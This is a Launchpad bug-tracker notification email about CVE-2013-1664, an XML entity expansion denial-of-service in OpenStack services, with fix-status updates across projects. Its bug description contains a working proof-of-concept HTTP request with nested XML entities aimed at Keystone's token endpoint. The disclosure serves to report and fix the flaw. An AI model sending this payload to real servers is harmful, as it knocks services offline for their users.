** Changed in: oslo/grizzly Importance: Undecided => High ** Changed in: oslo/grizzly Status: New => Fix Released
** Changed in: oslo/grizzly Milestone: None => 2013.1 ** Changed in: oslo/grizzly Assignee: (unassigned) => Davanum Srinivas (DIMS) (dims-v) -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to quantum. https://bugs.launchpad.net/bugs/1100282 Title: DoS through XML entity expansion (CVE-2013-1664) Status in Cinder: Fix Released Status in Cinder folsom series: Fix Committed Status in OpenStack Identity (Keystone): Fix Released Status in Keystone essex series: Fix Committed Status in Keystone folsom series: Fix Committed Status in OpenStack Compute (Nova): Fix Released Status in OpenStack Compute (nova) essex series: Fix Committed Status in OpenStack Compute (nova) folsom series: Fix Committed Status in Oslo - a Library of Common OpenStack Code: Fix Released Status in oslo grizzly series: Fix Released Status in OpenStack Quantum (virtual network service): Fix Released Bug description: Jonathan Murray from NCC Group reported that you can DoS keystone servers using XML entities in Keystone requests. [ Joshua Harlow from Yahoo! independently reported the same issue plaguing Nova (using minidom). ] POST /v2.0/tokens HTTP/1.1 content-type: application/xml <!DOCTYPE foo [ <!ENTITY a "AAAA lots of As AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAvAAAAAAAAAA" > <!ENTITY b "&a;&a;&a;&a;&a;&a;&a;&a;" > <!ENTITY c "&b;&b;&b;&b;&b;&b;&b;&b;" > ]> <auth> <tenantName>&c;</tenantName> <passwordCredentials> <username>&c;</username> <username>&c;</username> <username>&c;</username> <username>&c;</username> <password>&c;</password> <somethingElse>&c;</somethingElse> <somethingElse1>&c;</somethingElse1> <somethingElse2>&c;</somethingElse2> </passwordCredentials> </auth> In that precise case it might be an issue with the XML library we use, although it sounds generally safer to disable parsing ENTITY blocks entirely if we can. To manage notifications about this bug go to: https://bugs.launchpad.net/cinder/+bug/1100282/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp